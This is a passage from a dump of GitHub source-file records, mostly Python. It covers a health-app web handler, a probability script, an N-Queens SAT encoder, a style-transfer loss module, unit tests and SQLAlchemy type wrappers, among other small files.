self.get_argument('verifyYear')\r\n        cureWay = self.get_argument('cureWay')\r\n        dsPlan = self.get_argument('dsPlan')\r\n        complication = self.get_argument('complication')\r\n\r\n        data = sugarGuideController.createHealthWeekly(session_id, gender, age, height, weight,\r\n                                                       sugarType, diseaseAge, akin, fm,\r\n                                                       manyDrinkWc, posion, thirsty,\r\n                                                       visionDown, diseaseSpeed, verifyYear,\r\n                                                       cureWay, dsPlan, complication)\r\n        self.write(json.dumps(data))\r\n\r\n# Fetch the weekly health report\r\nclass GetHealthWeekly(RequestHandler):\r\n    @gen.coroutine\r\n    def post(self):\r\n        session_id = self.get_argument('session_id')\r\n        data = sugarGuideController.retireveHealthWeekly(session_id)\r\n        self.render('healthWeekly.html', cerealsValue=data['diet']['cerealsValue'],\r\n                    cereals=data['diet']['cereals'],fruitValue=data['diet']['fruitValue'],\r\n                    fruit=data['diet']['fruit'],meatValue=data['diet']['meatValue'],\r\n                    meat=data['diet']['meat'],milkValue=data['diet']['milkValue'],\r\n                    milk=data['diet']['milk'],fatValue=data['diet']['fatValue'],\r\n                    fat=data['diet']['fat'],vegetablesValue=data['diet']['vegetablesValue'],\r\n                    vegetables=data['diet']['vegetables'],\r\n                    sport1=data['sport']['sport1'],sport2=data['sport']['sport2'],\r\n                    sport3=data['sport']['sport3'],sport4=data['sport']['sport4'],\r\n                    time1=data['sport']['time1'], time2=data['sport']['time2'],\r\n                    time3=data['sport']['time3'], time4=data['sport']['time4'],\r\n                    week1=data['sport']['week1'], week2=data['sport']['week2'],\r\n                    week3=data['sport']['week3'], week4=data['sport']['week4'],\r\n                    min1=data['control']['min1'],max1=data['control']['max1'],\r\n                    min2=data['control']['min2'],max2=data['control']['max2'],\r\n                    sleep1=data['control']['sleep1'],sleep2=data['control']['sleep2'],)\r\n","repo_name":"zhuxiyulu/sugar","sub_path":"handlers/sugarGuideHandler.py","file_name":"sugarGuideHandler.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"41285341350","text":"class student:\r\n    
holidays=23\r\n print(\"hello\")\r\nvariable1=student()\r\nvariable2=student()\r\nvariable1.name=\"sarthak\"\r\nvariable1.Class='college'\r\n#print(variable1.holidays)\r\n#print(variable2.holidays)\r\nprint(variable1)\r\n\r\ntext = \"Python tutorial for absolute beginners.\"\r\nt = text.split()\r\nprint(t)\r\n\r\n","repo_name":"sarthaklikhwar/my-work-in-python","sub_path":"code16.py","file_name":"code16.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"42134668615","text":"import math\n\nfrom scipy.stats import bernoulli\nimport numpy as np\ndef binomial_coefficient(n, k):\n return math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n\ndef probability_of_3_heads(n, p):\n k = 3 # Number of heads\n q = 1 - p # Probability of getting a tail\n probability = binomial_coefficient(n, k) * (p ** k) * (q ** (n - k))\n return probability\n\nn = 8 # Total number of coin tosses\np = 0.5 # Probability of getting a head in one coin toss\n\nresult = probability_of_3_heads(n, p)\nprint(f\"The probability of getting exactly 3 heads in {n} coin tosses is {result:.8f}\")\n\n\nsimulated_results = bernoulli.rvs(result, size=1000000)\nsimulated_prob = np.mean(simulated_results)\ndata_bern = bernoulli.rvs(size=10,p=result)\nprint(f\"Simulated probability : {simulated_prob:.8f}\")\nprint(\"Samples generated:\",data_bern)\n","repo_name":"gadepall/digital-communication","sub_path":"exemplar/12/13/3/81/codes/prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"42095529113","text":"#!/usr/bin/env python\n\n# 8 Queens\n# RCRA - UDC - 03-02-17\n# Miguel Mosuera\n# miguel.mosuera.perez@udc.es\n# github.com/unrealmitch\n#\n# Description: 4..8..N Queens Solution for Clasp\n\nimport sys\n\ndef printboard(n):\n\toutput = \"\"\n\tfor i in range(0,n):\n\t\tfor j in range(0,n):\n\t\t\toutput += str(i*n+j+1).zfill(2) + \" \"\n\t\toutput += \"\\n\"\n\n\treturn output\t\t\n\ndef calcDiag(n):\n\trules = []\n\n\t#Top-> Left2Right\n\tfor i in range(0,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(j*n+j+1+i))\n\t\t\t\trule.append(-(k*n+k+1+i))\n\t\t\t\trules.append(rule)\n\n\t#Bot-> Left2Right\n\tfor i in range(1,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(n*i+j*n+j+1))\n\t\t\t\trule.append(-(n*i+n*k+k+1))\n\t\t\t\trules.append(rule)\n\n\t#Top-> R2L\n\tfor i in range(0,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(j*n-j+n-i))\n\t\t\t\trule.append(-(k*n-k+n-i))\n\t\t\t\trules.append(rule)\n\n\t#Bot-> R2L\n\tfor i in range(1,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(i*n+n+j*n-j))\n\t\t\t\trule.append(-(i*n+n+k*n-k))\n\t\t\t\trules.append(rule)\n\n\treturn rules\n\ndef calcCols(n):\n\trules = []\n\n\tfor i in range(0,n):\n\t\trule = []\n\n\t\tfor j in range(0,n):\n\t\t\trule.append((i+j*n)+1)\n\t\trules.append(rule);\n\n\n\t\tfor j in range(0,n-1):\n\t\t\tfor k in range(j+1,n):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(j*n+1+i))\n\t\t\t\trule.append(-(k*n+1+i))\n\t\t\t\trules.append(rule)\n\n\treturn rules\n\ndef calcRows(n):\n\trules = []\n\n\tfor i in range(0,n):\n\t\trule = []\n\t\ts = i * n + 1 \t\t\t#Start of actual row\n\n\t\tfor j 
in range(0,n):\n\t\t\trule.append(s+j)\n\t\trules.append(rule);\n\n\n\t\tfor j in range(0,n-1):\n\t\t\tfor k in range(j+1,n):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(s+j))\n\t\t\t\trule.append(-(s+k))\n\t\t\t\trules.append(rule)\n\n\treturn rules\n\ndef list2string(input):\n\toutput = \"\"\n\n\tfor rule in input:\n\t\tfor atom in rule:\n\t\t\toutput += str(atom).zfill(2) + \" \"\n\t\t\t#output += str(atom).rjust(2, '0') + \" \"\n\t\toutput += \"0 \\n\"\n\n\treturn output\n\ndef genNqueen(n):\n\n\trows = calcRows(n)\n\tcols = calcCols(n)\n\tdiag = calcDiag(n)\n\n\tn_rules = len(rows) + len(cols) + len(diag)\n\tn_atoms = n*n\n\n\toutput = \"c NQUEENS: \" + str(n) \n\toutput += \"\\np cnf \" + str(n_atoms) + \" \" + str(n_rules) + \"\\n\"\n\toutput += \"\\nc Rows:\\n\" + list2string(rows)\n\toutput += \"\\nc Colums:\\n\" + list2string(cols)\n\toutput += \"\\nc Diagonals:\\n\" + list2string(diag)\n\n\tprint(printboard(n))\n\tprint(list2string(rows))\n\tprint(list2string(cols))\n\tprint(list2string(diag))\n\n\treturn output\n\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint(\"Error: How many queens? [Missing arg1: command n_queens file_output]\")\n\t\tsys.exit(0)\n\telse:\n\t\toutput = genNqueen(int(sys.argv[1]))\n\t\tif len(sys.argv) > 2:\n\t\t\toutfile = open(sys.argv[2], 'w')\n\t\t\toutfile.write(output)\n\t\t\toutfile.close()\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"unrealmitch/FIC","sub_path":"RCRA/Practicas/nqueen/nqueen.py","file_name":"nqueen.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32554494433","text":"for t in range(1,int(input())+1):\n map = []\n max_len = 0\n for i in range(5):\n tmp = input()\n map.append(tmp)\n if len(tmp) > max_len:\n max_len = len(tmp)\n b = ''\n for i in range(max_len):\n for j in map:\n if len(j) <= i:\n continue\n b += j[i]\n print(f'#{t} {b}')","repo_name":"jbsam2/algo_problem","sub_path":"swea/D3/5356. 의석이의 세로로 말해요.py","file_name":"5356. 의석이의 세로로 말해요.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73817300026","text":"try:\r\n __SLYCOT_SETUP__\r\nexcept NameError:\r\n __SLYCOT_SETUP__ = False\r\n\r\n\r\nif __SLYCOT_SETUP__:\r\n import sys as _sys\r\n _sys.stderr.write('Running from Slycot source directory.\\n')\r\n del _sys\r\nelse:\r\n\r\n # import slycot.examples\r\n\r\n # The Slycot library is organised by 11-chapters. 
Each chapter can be identified by a single letter.\r\n # The following chapters are included:\r\n # A : Analysis Routines (included)\r\n # B : Benchmark\r\n # C : Adaptive Control\r\n # D : Data Analysis\r\n # F : Filtering\r\n # I : Identification\r\n # M : Mathematical Routines (included)\r\n # N : Nonlinear Systems\r\n # S : Synthesis Routines (included)\r\n # T : Transformation Routines (included)\r\n # U : Utility Routines\r\n\r\n\r\n # Analysis routines (17/60 wrapped)\r\n from .analysis import (ab01nd,\r\n ab04md,\r\n ab05md, ab05nd,\r\n ab07nd,\r\n ab08nd, ab08nz,\r\n ab09ad, ab09ax, ab09bd, ab09md, ab09nd,\r\n ab13bd, ab13dd, ab13ed, ab13fd, ab13md)\r\n\r\n # Benchmark routines (0/6 wrapped)\r\n\r\n # Adaptive control routines (0/0 wrapped)\r\n\r\n # Data analysis routines (0/8 wrapped)\r\n\r\n # Filtering routines (0/6 wrapped)\r\n\r\n # Identification routines (0/15 wrapped)\r\n\r\n # Mathematical routines (8/281 wrapped)\r\n from .math import (mb02ed, mb03rd, mb03vd, mb03vy, mb03wd,\r\n mb05md, mb05nd,\r\n mc01td)\r\n\r\n # Nonlinear Systems (0/16 wrapped)\r\n\r\n # Synthesis routines ((16+1)/131 wrapped), sb03md57 is not part of slicot\r\n from .synthesis import (sb01bd,\r\n sb02md, sb02mt, sb02od,\r\n sb03md, sb03md57, sb03od,\r\n sb04md, sb04qd,\r\n sb10ad, sb10dd, sb10fd, sb10hd, sb10yd,\r\n sg02ad,\r\n sg03ad, sg03bd)\r\n\r\n # Transformation routines (10/77 wrapped)\r\n from .transform import (tb01id, tb01pd,\r\n tb03ad,\r\n tb04ad,\r\n tb05ad,\r\n tc01od, tc04ad,\r\n td04ad,\r\n tf01md, tf01rd)\r\n\r\n # Utility routines (0/7 wrapped)\r\n\r\n\r\n from .version import __version__\r\n\r\n\r\ndef test():\r\n import pytest\r\n pytest.main(['--pyargs', 'slycot'])\r\n","repo_name":"python-control/Slycot","sub_path":"slycot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"6"} +{"seq_id":"71145447867","text":"from __future__ import print_function\nimport functools\nimport vgg, pdb, time\nimport tensorflow as tf, numpy as np, os\nimport transform\nfrom utils import save_img, get_img, exists, list_files\nimport cv2\n\nvgg_path = '/media/xc/c728432c-8ae3-4aeb-b43d-9ef02faac4f8/GAN-UNet/data/imagenet-vgg-verydeep-19.mat'\n\nSTYLE_LAYERS = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')\nCONTENT_LAYER = ('relu4_2',)\n\n\n'''\n###get the style features of style images\n'''\ndef get_style_features(style_img):\n\n image = tf.multiply(style_img + 1, 127.5)\n\n if image._shape_as_list()[1] != 128:\n image = tf.image.resize_images(image,[128, 128])\n\n style_features = {}\n\n style_image_pre = vgg.preprocess(image)\n net = vgg.net(vgg_path, style_image_pre)\n\n for layer in STYLE_LAYERS:\n features = net[layer] #.eval(feed_dict={style_img: style_image_pre})\n features = tf.reshape(features, shape=[-1, features._shape_as_list()[1]*features._shape_as_list()[2], features._shape_as_list()[3]])[0]\n gram = tf.matmul(tf.transpose(features), features) / float(features._shape_as_list()[0]*features._shape_as_list()[1])\n style_features[layer] = gram\n\n return style_features\n\n\n'''\n### get the content features of content images\n'''\ndef get_content_features(content_img):\n\n image = tf.multiply(content_img + 1, 127.5)\n\n if image._shape_as_list()[1] != 128:\n image = tf.image.resize_images(image, [128, 128])\n\n content_features = {}\n\n X_pre = vgg.preprocess(image)\n content_net = vgg.net(vgg_path, X_pre)\n\n for layer in CONTENT_LAYER:\n 
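# --- editorial note (added): CONTENT_LAYER is the one-element tuple ('relu4_2',) defined at the top\n        # of this module, so this loop stores a single VGG-19 feature map keyed by that layer name,\n        # mirroring the dict shape used by get_style_features above. ---\n        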
content_features[layer] = content_net[layer] #.eval(feed_dict={content_img: X_pre})\n\n return content_features\n\n\n'''\n### get the style loss by calculating the difference \nbetween the style_image and genetated image\n'''\ndef get_style_loss(style_features, style_img):\n\n style_img_features = get_style_features(style_img)\n\n style_lossE = 0\n for style_layer in STYLE_LAYERS:\n coff = float(1.0 / len(STYLE_LAYERS))\n img_gram = style_img_features[style_layer]\n style_gram = style_features[style_layer]\n style_lossE += coff * tf.reduce_mean(tf.abs(img_gram - style_gram))\n\n\n style_loss = tf.reduce_mean(style_lossE)\n\n return style_loss\n\n\n'''\n### get the content loss by calculating the difference \n between the synthesized image and genetated image\n'''\ndef get_content_loss(img, syn_img):\n\n img_features = get_content_features(img)\n syn_features = get_content_features(syn_img)\n\n content_lossE = 0\n for content_layer in CONTENT_LAYER:\n coff = float(1.0 / len(CONTENT_LAYER))\n img_content = img_features[content_layer]\n syn_content = syn_features[content_layer]\n content_lossE += coff * tf.reduce_mean(tf.abs(img_content - syn_content))\n\n content_loss = tf.reduce_mean(content_lossE)\n\n return content_loss\n\n\n'''\n### get the total variation loss\n'''\ndef get_tv_loss(preds):\n\n img = preds\n\n tv_loss = tf.reduce_mean(tf.abs(img[:, 1:, :, :] - img[:, :-1, :, :])) + \\\n tf.reduce_mean(tf.abs(img[:, :, 1:, :] - img[:, :, :-1, :]))\n\n return tv_loss\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xiezhongzhao/GAN-and-Style-Transfer-Hand-Pose-Estimation","sub_path":"src/StyleFeature.py","file_name":"StyleFeature.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"19315654160","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 1 21:22:02 2022\n\n@author: Nicholas Nikolov\n\"\"\"\nimport os\n\nos.chdir(\"C:\\\\Users\\\\nikol\\\\OneDrive\\\\Professional\\\\Learning\\\\2022-Financial_Scrape_and_Forecast\")\n\nimport src.etl_methods as etl\nimport src.sentiment_analysis as sa\n\nparameters = etl.get_parameters()\n\ndef run_data_populater(parameters):\n print(\"Running run_data_populater\")\n \n '''\n Main method for populating extracted data into the DB.\n '''\n \n # Declare the variables\n data_list = parameters['data_list']\n ticker_symbols = parameters[\"ticker_symbols\"]\n \n # Update the DB dict\n etl.update_ticker_symbols_db(ticker_symbols)\n \n # The data dictionary containing the base Yahoo! 
Finance data\n return_dict = etl.generate_data_dict(data_list , ticker_symbols)\n \n # Zenserp \n zenserp_dict = etl.generate_zenserp_dict(ticker_symbols)\n \n # Sentiment Analysis\n sentiment_dict = sa.determine_sentiments_from_dict(zenserp_dict)\n \n # Computes the sentiment averages by sentiment level\n sentiment_averages = sa.compute_sentiment_averages(sentiment_dict)\n \n # Merges sentiment_averages to the return_dict\n merged_data = etl.merge_data(return_dict , sentiment_averages)\n \n # Uploads all scraped data to the DB\n upload_query = etl.upload_extracted_data(merged_data)\n \n return return_dict\n\n\ntest = run_data_populater(parameters)\n\n# {'neu':'1'}","repo_name":"NicholasNikolov/2022-FinancialModeling","sub_path":"run/run_data_populater.py","file_name":"run_data_populater.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5144973461","text":"#!/usr/bin/env python3\n\nimport argparse\nimport collections\nimport os\n\nDEFAULT_MOTIF_DIR = \"motifs_py\"\nDEFAULT_MOTIF_COUNT = \"motif_count_py.txt\"\n\nFastaEntry = collections.namedtuple(\"FastaEntry\", [\"desc\", \"seq\"])\n\ndef get_fasta_entry(f):\n \"\"\"Generator - produces a description and sequence line from a fasta\n\n Args:\n f (file handle): handle to fasta file\n\n Yields:\n FastaEntry: NamedTuple of desc and seq\n \"\"\"\n desc = f.readline()\n while desc:\n seq = f.readline()\n result = FastaEntry(desc, seq)\n yield result\n desc = f.readline()\n\ndef main():\n \"\"\"main\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Count motifs in a fasta\")\n parser.add_argument(\"fasta_file\", help=\"fasta file\")\n parser.add_argument(\"motifs_file\", help=\"text file of motifs to search for\")\n parser.add_argument(\"-d\", \"--motif-dir\", dest=\"motif_dir\", default=DEFAULT_MOTIF_DIR, help=\"directory to save motif fastas\")\n parser.add_argument(\"-c\", \"--motif-count\", dest=\"motif_count\", default=DEFAULT_MOTIF_COUNT, help=\"file to save motif counts\")\n args = parser.parse_args()\n\n os.makedirs(args.motif_dir)\n\n motif_count = collections.OrderedDict()\n motif_matches = collections.OrderedDict()\n\n with open(args.motifs_file) as f:\n for motif in f:\n motif_count[motif.strip()] = 0\n motif_matches[motif.strip()] = []\n \n with open(args.fasta_file) as f:\n entry_gen = get_fasta_entry(f)\n for entry in entry_gen:\n for motif in motif_count:\n matches = entry.seq.count(motif)\n if matches > 0:\n motif_count[motif] += matches\n motif_matches[motif].append(entry)\n \n with open(args.motif_count, \"w\") as f:\n for motif in motif_count:\n f.write(\"{} {}\\n\".format(motif, motif_count[motif]))\n\n for motif in motif_matches:\n with open(os.path.join(args.motif_dir, \"{}.fasta\".format(motif)), \"w\") as f:\n for entry in motif_matches[motif]:\n f.write(entry.desc)\n f.write(entry.seq)\n\nif __name__ == \"__main__\":\n main()","repo_name":"rjrico510/rbif100","sub_path":"week2/scripts/python/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26248010076","text":"from delfin.leader_election.tooz.callback import ToozLeaderElectionCallback\nfrom delfin.leader_election.tooz.leader_elector import Elector\nfrom delfin.task_manager.scheduler.schedule_manager import SchedulerManager\n\nLEADER_ELECTION_KEY = \"delfin-performance-metric-collection\"\n\n\nclass LeaderElectionFactory:\n\n 
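# --- editorial aside (added; hedged usage sketch, not part of the original module) ---\n    #   elector = LeaderElectionFactory.construct_elector(\"tooz\")\n    # Any plugin value other than \"tooz\" raises ValueError, as implemented below.\n    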
@staticmethod\n def construct_elector(plugin, leader_key=None):\n \"\"\"\n Construct leader election elector based on specified plugin\n\n :param string plugin: required plugin for leader election\n \"\"\"\n # Maintain a unique key for metric collection leader election\n leader_election_key = LEADER_ELECTION_KEY\n if leader_key:\n leader_election_key = leader_key\n\n scheduler_mgr = SchedulerManager()\n\n if plugin == \"tooz\":\n scheduler_mgr.start()\n # Create callback object\n callback = ToozLeaderElectionCallback.register(\n on_leading_callback=scheduler_mgr.schedule_boot_jobs,\n on_stop_callback=scheduler_mgr.stop)\n\n return Elector(callback, leader_election_key)\n else:\n raise ValueError(plugin)\n","repo_name":"sodafoundation/delfin","sub_path":"delfin/leader_election/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"6"} +{"seq_id":"69999261628","text":"import unittest\nimport faiss\n\nfrom spdb import utils\n\nclass TestGetNumClusters(unittest.TestCase):\n\n test_cases = [\n (10000, 200),\n (1000000, 6324),\n (100000000, 200000),\n ]\n def test__get_num_clusters(self):\n for num_vectors, expected_num_clusters in self.test_cases:\n with self.subTest(num_vectors=num_vectors, expected_num_clusters=expected_num_clusters):\n num_clusters = utils.get_num_clusters(num_vectors)\n self.assertEqual(num_clusters, expected_num_clusters)\n\n\nclass TestGetNProbe(unittest.TestCase):\n\n test_cases = [\n (200, 100),\n (1000, 250),\n (6350, 444),\n (200000, 6000),\n ]\n def test__get_n_probe(self):\n for num_clusters, expected_n_probe in self.test_cases:\n with self.subTest(num_clusters=num_clusters, expected_n_probe=expected_n_probe):\n n_probe = utils.get_n_probe(num_clusters)\n self.assertEqual(n_probe, expected_n_probe)\n\n\nclass TestGetTrainingMemoryUsage(unittest.TestCase):\n\n ### Test get_training_memory_usage ###\n def test__get_training_memory_usage(self):\n memory_usage = utils.get_training_memory_usage(vector_dimension = 768, num_vectors = 100000)\n self.assertEqual(memory_usage, 921600000)\n\n\nclass TestGetNumBatches(unittest.TestCase):\n\n ### Test get_num_batches ###\n def test__get_num_batches(self):\n num_batches = utils.get_num_batches(num_vectors = 1000000, vector_dimension = 768, max_memory_usage = 4*1024*1024*1024)\n self.assertEqual(num_batches, 3)\n\n\nclass TestDetermineOptimalTrainingMethod(unittest.TestCase):\n\n ### Test determine_optimal_training_method ###\n def test__is_two_level_clustering_optimal__clustering(self):\n # 5M vectors\n use_two_level_clustering = utils.is_two_level_clustering_optimal(max_memory_usage = 4*1024*1024*1024, vector_dimension = 768, num_vectors = 5000000)\n self.assertEqual(use_two_level_clustering, True)\n \n def test__is_two_level_clustering_optimal__subsampling(self):\n # 1M vectors\n use_two_level_clustering = utils.is_two_level_clustering_optimal(max_memory_usage = 4*1024*1024*1024, vector_dimension = 768, num_vectors = 1000000)\n self.assertEqual(use_two_level_clustering, False)\n\n\nclass TestCalculateTrainedIndexCoverageRatio(unittest.TestCase):\n\n # Create a list of 1000 vectors from 0 to 999\n lmdb_ids = range(1000)\n # Create a list of 100 vectors from 0 to 99\n saved_index_ids = range(100)\n\n ### Partial coverage ###\n def test__calculate_trained_index_coverage_ratio__with_saved_index(self):\n coverage_ratio = utils.calculate_trained_index_coverage_ratio(self.lmdb_ids, self.saved_index_ids)\n 
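# --- editorial note (added): 100 of the 1000 lmdb ids fall in saved_index_ids, hence 100/1000 = 0.1 ---\n        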
self.assertEqual(coverage_ratio, 0.1)\n    \n    ### Full coverage ###\n    def test__calculate_trained_index_coverage_ratio__full_coverage(self):  # renamed: previously shadowed the partial-coverage test above\n        coverage_ratio = utils.calculate_trained_index_coverage_ratio(self.saved_index_ids, self.lmdb_ids)\n        self.assertEqual(coverage_ratio, 1)\n\n    ### No saved ids (case where an index hasn't been trained yet) ###\n    def test__calculate_trained_index_coverage_ratio__no_saved_index(self):\n        coverage_ratio = utils.calculate_trained_index_coverage_ratio(self.lmdb_ids, [])\n        self.assertEqual(coverage_ratio, 0)\n    \n    ### No lmdb ids (case where someone removed all vectors, but previously trained an index) ###\n    def test__calculate_trained_index_coverage_ratio__no_lmdb_ids(self):\n        coverage_ratio = utils.calculate_trained_index_coverage_ratio([], self.saved_index_ids)\n        self.assertEqual(coverage_ratio, 0)\n\n\nclass TestCheckIsFlatIndex(unittest.TestCase):\n    \n    def test__check_is_flat_index__True(self):\n        faiss_index = faiss.IndexFlat(768)\n        faiss_index = faiss.IndexIDMap(faiss_index)\n        is_index_flat = utils.check_is_flat_index(faiss_index)\n        self.assertTrue(is_index_flat)\n    \n    def test__check_is_flat_index__False(self):\n        faiss_index = faiss.index_factory(768, \"PCA256,IVF4096,PQ32\")\n        is_index_flat = utils.check_is_flat_index(faiss_index)\n        self.assertFalse(is_index_flat)\n","repo_name":"Rumman954/spDB","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72784324987","text":"# https://www.codewars.com/kata/643a47fadad36407bf3e97ea\n\ndef encode_cd(n):\n    bitmask = f'{n:b}'.zfill(8)[::-1]\n    res = 'P'\n    prev = res\n    for x in bitmask:\n        if x == '0':\n            res += prev\n        else:\n            if prev == 'P':\n                res += 'L'\n            else:\n                res += 'P'\n        prev = res[-1]\n    return res\n","repo_name":"blzzua/codewars","sub_path":"7-kyu/encode_data_on_cd_compact_disc_surface.py","file_name":"encode_data_on_cd_compact_disc_surface.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14255890546","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom _MOM import MOM\nfrom _TFL import TFL\nfrom _TFL.pyk import pyk\n\nfrom _MOM._DBW._SAW import SA\nimport _MOM._Attr.Type\n\nimport _TFL._Meta.Object\nimport _TFL._Meta.Property\n\nimport datetime\n\nclass _Id_Entity_ (SA.types.TypeDecorator) :\n    \"\"\"Augmented integer type that converts entities to pids\"\"\"\n\n    def process_bind_param (self, value, dialect) :\n        return getattr (value, \"pid\", value)\n    # end def process_bind_param\n\n# end class _Id_Entity_\n\nclass _Time_X_ (SA.types.TypeDecorator) :\n    \"\"\"Augmented time type that stores time values as datetime values\"\"\"\n\n    impl = SA.types.DateTime\n    _fake_date = datetime.date (1, 1, 1)\n\n    @TFL.Meta.Class_and_Instance_Method\n    def process_bind_param (soc, value, dialect) :\n        if isinstance (value, datetime.time) :\n            value = datetime.datetime.combine (soc._fake_date, value)\n        return value\n    # end def process_bind_param\n\n    def process_result_value (self, value, dialect) :\n        if isinstance (value, datetime.datetime) :\n            value = 
value.time ()\n return value\n # end def process_result_value\n\n# end class _Time_X_\n\nclass _Type_Name_Integer_ (SA.types.TypeDecorator) :\n \"\"\"Augmented integer type that converts MOM type_names to/from integers\"\"\"\n\n _MOM_ATW = None\n impl = SA.types.SmallInteger\n\n def process_bind_param (self, value, dialect) :\n tn_map = self._MOM_ATW.tn_map\n if value is None :\n value = -1\n elif isinstance (value, pyk.string_types) :\n value = tn_map [value]\n return value\n # end def process_bind_param\n\n def process_result_value (self, value, dialect) :\n if isinstance (value, pyk.int_types) :\n tn_map = self._MOM_ATW.tn_map\n return tn_map [value] if value >= 0 else None\n elif value is not None :\n return str (value)\n # end def process_result_value\n\n# end class _Type_Name_Integer_\n\nclass M_SA_Type (TFL.Meta.Object.__class__) :\n \"\"\"Encapsulate SQLalchemy types\"\"\"\n\n @TFL.Meta.Once_Property\n def P_Int_Types (cls) :\n \"\"\"Map (`min_value`, `max_value`) tuples to SA integer types\"\"\"\n _AI = MOM.Attr._A_Int_\n return \\\n ( (_AI.min_value_16, _AI.max_value_16, cls.SmallInteger)\n , (_AI.min_value_32, _AI.max_value_32, cls.Integer)\n , (_AI.min_value_64, _AI.max_value_64, cls.BigInteger)\n )\n # end def P_Int_Types\n\n @TFL.Meta.Once_Property\n def P_Type_Map (cls) :\n \"\"\"Map python types to SA types\"\"\"\n return \\\n { bool : cls.Boolean\n , datetime.date : cls.Date\n , datetime.datetime : cls.DateTime\n , datetime.time : cls.Time\n , float : cls.Float\n }\n # end def P_Type_Map\n\n def __getattr__ (cls, name) :\n if name.startswith (\"__\") and name.endswith (\"__\") :\n ### Placate inspect.unwrap of Python 3.5,\n ### which accesses `__wrapped__` and eventually throws `ValueError`\n return getattr (self.__super, name)\n result = getattr (SA.types, name)\n setattr (cls, name, result)\n return result\n # end def __getattr__\n\n# end class M_SA_Type\n\nclass SA_Type (TFL.Meta.BaM (TFL.Meta.Object, metaclass = M_SA_Type)) :\n \"\"\"Encapsulate SQLalchemy types\"\"\"\n\n _Time_X_ = _Time_X_\n _Type_Name_ = _Type_Name_Integer_\n\n Decimal = SA.types.Numeric\n\n def __init__ (self, ATW) :\n self._ATW = ATW\n # end def __init__\n\n @TFL.Meta.Once_Property\n def Id_Entity (self) :\n \"\"\"Augmented integer type that converts entities to pids\"\"\"\n ATW = self._ATW\n ET = ATW.app_type [\"MOM.Id_Entity\"]\n pid = ET.pid\n return _Id_Entity_.__class__ \\\n ( str (\"Id_Entity\"), (_Id_Entity_, )\n , dict (impl = self.sized_int_type (pid.Pickled_Type))\n )\n # end def Id_Entity\n\n def sized_int_type (self, pts) :\n \"\"\"Return the smallest SA integer type that can hold\n (`pts.min_value`, `pts.max_value`)\n \"\"\"\n result = None\n _AI = MOM.Attr._A_Int_\n max_value = pts.max_value or _AI.max_value_32\n min_value = pts.min_value or _AI.min_value_32\n for tmin, tmax, result in self.P_Int_Types :\n if tmin <= min_value < max_value <= tmax :\n break\n else :\n raise TypeError \\\n ( \"Cannot map integer type with max-value %d and min-value %d \"\n \"to a database type\"\n % (max_value, min_value)\n )\n return result\n # end def sized_int_type\n\n @TFL.Meta.Once_Property\n def Type_Name (self) :\n \"\"\"Augmented integer type that converts MOM type_names to/from integers\"\"\"\n return self._Type_Name_.__class__ \\\n ( str (\"Type_Name\"), (self._Type_Name_, )\n , dict (_MOM_ATW = self._ATW)\n )\n # end def Type_Name\n\n def __getattr__ (self, name) :\n if name.startswith (\"__\") and name.endswith (\"__\") :\n ### Placate inspect.unwrap of Python 3.5,\n ### which accesses 
